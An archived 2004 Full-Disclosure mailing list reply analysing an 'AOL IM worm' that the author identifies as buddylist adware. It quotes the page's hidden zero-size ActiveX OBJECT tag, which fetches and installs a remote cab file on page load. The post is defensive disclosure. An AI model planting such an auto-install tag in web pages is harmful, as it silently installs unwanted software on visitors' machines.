SV: [Full-Disclosure] AOL IM Worm
Date: Wed Feb 11 2004 - 15:18:24 EST
Hi,
Itīs a Buddylist Adware. The page uses codebase object to run the
ActiveX component:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,
0,001">
The cab file contains the files Shellinstaller.ini (2.119 bytes) and the
binary ShellInstaller.ocx (81.920 bytes). The activex component hooks
itself to IE and works as a typical adware component. No virus code
here.
McAfee has posted a writeup at this URL:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101007
Regards
Peter Kruse
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Wed Feb 11 15:54:20 2004
This archive was generated by hypermail 2.1.8 : Wed Feb 11 2004 - 16:01:03 EST
